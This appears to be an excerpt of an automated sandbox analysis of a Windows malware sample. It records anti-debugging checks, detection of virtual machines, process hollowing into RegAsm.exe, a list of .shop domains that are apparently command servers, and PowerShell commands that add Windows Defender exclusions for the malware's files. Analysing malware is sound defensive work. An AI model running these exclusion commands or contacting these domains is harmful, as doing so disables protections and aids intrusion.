                                Source: msedge.exe, 0000002A.00000002.1867281661.0000000002D53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]2i
                                Source: kdmapper.exe, 0000000C.00000002.1314407676.0000000000C31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                Source: RegAsm.exe, 00000013.00000002.1364981690.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365221723.0000000000E98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: msedge.exe, 0000002A.00000002.1821903588.0000000000E0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}X
                                Source: curl.exe, 0000000E.00000003.1325345916.000001EBAEA13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: curl.exe, 0000000A.00000003.1304898793.0000013FD8193000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.1304965327.0000013FD8196000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1305291488.0000013FD8196000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000002A.00000002.1821903588.0000000000E0B000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000002F.00000002.1596146161.000002190FEE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: msedge.exe, 00000031.00000002.1782893319.000000001BEF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: C:\Windows\Speech\kdmapper.exeAPI call chain: ExitProcess graph end nodegraph_12-25059
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeProcess information queried: ProcessInformationJump to behavior

                                Anti Debugging

                                barindex
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DD4BF0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF735DD4BF0
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeOpen window title or class name: ollydbg
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeOpen window title or class name: windbgframeclass
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeOpen window title or class name: ollydbg.exe
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00446730 LdrInitializeThunk,19_2_00446730
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DD4BF0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF735DD4BF0
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DD4BF0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF735DD4BF0
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DD4BF0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF735DD4BF0
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00E07DEE mov eax, dword ptr fs:[00000030h]12_2_00E07DEE
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DD4BF0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF735DD4BF0
                                Source: C:\Edge\msedge.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Users\user\AppData\Local\Idle.exeProcess token adjusted: Debug
                                Source: C:\Users\user\AppData\Local\Idle.exeProcess token adjusted: Debug
                                Source: C:\Edge\msedge.exeProcess token adjusted: Debug
                                Source: C:\Edge\msedge.exeProcess token adjusted: Debug
                                Source: C:\Edge\msedge.exeProcess token adjusted: Debug
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DEADE8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF735DEADE8
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DFF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00DFF838
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DFF9D5 SetUnhandledExceptionFilter,12_2_00DFF9D5
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DFFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00DFFBCA
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00E08EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00E08EBD
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe'
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe'Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeCode function: 17_2_02F42129 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,17_2_02F42129
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                                Source: physmeme.exe, 00000011.00000002.1340947604.0000000003F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: strappystyio.shop
                                Source: physmeme.exe, 00000011.00000002.1340947604.0000000003F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: coursedonnyre.shop
                                Source: physmeme.exe, 00000011.00000002.1340947604.0000000003F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: fossillargeiw.shop
                                Source: physmeme.exe, 00000011.00000002.1340947604.0000000003F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tendencerangej.shop
                                Source: physmeme.exe, 00000011.00000002.1340947604.0000000003F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: appleboltelwk.shop
                                Source: physmeme.exe, 00000011.00000002.1340947604.0000000003F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tearrybyiwo.shop
                                Source: physmeme.exe, 00000011.00000002.1340947604.0000000003F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: captainynfanw.shop
                                Source: physmeme.exe, 00000011.00000002.1340947604.0000000003F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: surveriysiop.shop
                                Source: physmeme.exe, 00000011.00000002.1340947604.0000000003F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tiddymarktwo.shop
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44C000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44F000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45F000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B75008Jump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DDEDD0 pow,pow,pow,sqrt,mouse_event,mouse_event,_invalid_parameter_noinfo_noreturn,0_2_00007FF735DDEDD0
